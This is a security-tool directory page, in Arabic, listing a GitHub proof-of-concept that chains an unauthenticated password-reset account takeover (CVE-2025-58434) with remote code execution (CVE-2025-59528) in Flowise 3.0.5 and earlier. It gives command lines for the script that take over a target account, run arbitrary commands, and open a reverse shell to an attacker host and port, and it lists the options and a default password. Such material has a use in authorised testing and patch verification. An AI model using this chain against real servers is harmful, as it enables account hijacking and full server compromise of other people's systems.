Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-58434-59528 — CVE-2025-58434 و CVE-2025-59528 سلسلة POC | Kitploit
أدوات/GitHubGitHub/azureadtrent/cve-2025-58434-59528
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةأداة الوصول عن بعد
GitHubazureadtrent/cve-2025-58434-59528

CVE-2025-58434-59528

CVE-2025-58434 و CVE-2025-59528 سلسلة POC

عرض المستودع
47منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-58434 + CVE-2025-59528

سلسلة استغلال لثغرتين تؤثران على Flowise <= 3.0.5.


الثغرات

CVE-2025-58434 — استيلاء غير موثّق على الحساب

تعيد نقطة نهاية إعادة تعيين كلمة المرور رمز إعادة تعيين صالحًا في استجابة API دون الحاجة إلى مصادقة. يمكن للمهاجم الذي يعرف عنوان بريد إلكتروني صالح إعادة تعيين كلمة مرور أي حساب دون تفاعل المستخدم.

CVE-2025-59528 — تنفيذ تعليمات برمجية عن بُعد موثّق

تمرّر عقدة CustomMCP إدخالًا يتحكم به المستخدم مباشرة إلى منشئ Function() بصلاحيات Node.js كاملة. يمكن للمستخدم الموثّق الذي يملك مفتاح API صالح تنفيذ أوامر نظام تشغيل عشوائية كمستخدم عملية Flowise.

مُصحّح في: Flowise 3.0.6


المتطلبات

  • Python 3.8+
  • pip install requests

الاستخدام

سلسلة ATO كاملة (إعادة تعيين كلمة المرور، طلب مفتاح API، تشغيل شل عكسي):

python3 flowise_chain.py -t http://target -e [email protected]

RCE فقط (إذا كان لديك مفتاح API بالفعل):

python3 flowise_chain.py -t http://target --api-key <KEY> -c "id"

شل عكسي بمفتاح موجود:

python3 flowise_chain.py -t http://target --api-key <KEY> --lhost 10.0.0.1 --lport 4444

الخيارات

العلمالوصف
-t, --targetعنوان URL الهدف
-e, --emailالبريد الإلكتروني للحساب الهدف (يُشغّل سلسلة ATO)
--api-keyتوفير مفتاح API مباشرة (يتخطى ATO)
-c, --commandالأمر المراد تنفيذه
--lhostعنوان IP للمهاجم للشل العكسي
--lportمنفذ المهاجم للشل العكسي (الافتراضي: 4444)
--new-passwordكلمة المرور المراد تعيينها أثناء إعادة التعيين (الافتراضي: Pwn3d!2026)
-k, --insecureتخطي التحقق من TLS

ملاحظات

نظرًا لخاصية غريبة في Flowise 3.0.5، فإن نقطة نهاية API لإعادة تعيين كلمة المرور لا تقوم بتحديث بيانات الاعتماد التي يقبلها نقطة نهاية تسجيل الدخول فورًا. يتوقف السكربت بعد إعادة التعيين ويطلب منك تسجيل الدخول إلى الواجهة يدويًا ونسخ مفتاح API من /apikey.

تنزيل الأداة